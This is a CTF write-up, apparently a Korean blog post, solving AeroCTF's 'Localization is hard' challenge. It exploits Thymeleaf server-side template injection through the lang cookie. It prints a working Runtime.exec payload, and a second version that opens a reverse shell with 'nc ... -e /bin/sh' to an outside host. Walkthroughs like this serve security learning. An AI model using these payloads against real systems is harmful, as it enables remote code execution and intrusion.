AeroCTF - Localization is hard

[Localization is Hard]
We made a little cafe for all the ctfers to relax after the competition.
The website is available in russian and english.
Try to find the flag somewhere in /

페이지에 접속하여 기능을 살펴보면 별다른 기능은 없고 영어, 러시아어로 변경해주는 기능이있다.
해당 기능은 쿠키 값에 lang=en 또는 ru 로 설정되어 처리된다.

GET / HTTP/1.1
Host: 151.236.114.211:7878
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.81
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://151.236.114.211:7878/
Accept-Encoding: gzip, deflate
Accept-Language: ko,en;q=0.9,en-US;q=0.8
Cookie: lang=en
Connection: close

 

Cookie가 사용자 입력을 받는 거의 유일한 기능이다.
lang 쿠키 값을 변조해보니 아래와 같은 응답이 발생한다.

thymeleaf라는 Template에서 exception이 발생하였다.
한번 SSTI쪽으로 방향을 잡아보고 payload를 테스트 해보았다. 
thymelaeaf SSTI Code Excecution 쪽으로 검색을 해보았다.

Spring View Manipulation Vulnerability | Veracode

Spring View Manipulation Vulnerability | Veracode

해당글에 code execution 할 수 있는 payload가 있다.

__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x

하지만 출력값을 받아볼 수 가없어서 nc를 통해 직접 연결하는 방법으로 payload를 변경해야한다.

__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("nc ctf.heogi.com 8888 -e /bin/sh").getInputStream()).next()}__::.x

정상적으로 연결이 되어 파일을 열어보면 플래그가 나온다.

Aero{j4va_1s_better_th4n_engl1sh}